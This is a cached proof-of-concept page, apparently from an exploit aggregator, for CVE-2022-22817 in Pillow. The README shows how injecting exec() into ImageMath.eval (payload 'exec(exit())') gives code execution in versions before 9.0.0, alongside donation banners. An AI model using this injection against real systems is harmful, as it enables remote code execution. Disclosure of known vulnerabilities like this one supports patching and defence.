Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-22817 PoC — Pillow 安全漏洞

Source
https://github.com/JawadPy/CVE-2022-22817-Exploit
Associated Vulnerability
Title:Pillow 安全漏洞 (CVE-2022-22817)
Description:Pillow是一款基于Python的图像处理库。 Pillow 9.0.0 之前存在安全漏洞,该漏洞源于 PIL.ImageMath.eval 允许评估任意表达式,例如使用 Python exec 方法的表达式。
Description
Example of CVE-2022-22817
Readme
# Intro
`PIL.ImageMath.eval()` Evaluate expression in the given environment.
For example:
```math
a * 2
```
We can use this to take RCE so easy if the target uses `PIL.ImageMath.eval` in Pillow before 9.0.0

# PoC
Instead using `ImageMath.eval()` for math opreations, we may insert `exec()` like this 
```python
ImageMath.eval("exec(exit())")
```
it will execute what's inside right away

# Support
If you would like to support me with donation, I recommend you to give it to someone who really need it please. If you do so then consider that i earned your support.

<a href="https://www.buymeacoffee.com/jawadpy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
File Snapshot

 [4.0K]  /data/pocs/cc93adc3e392dd14dca8d8935adfdf8eea02d274
└── [ 784]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.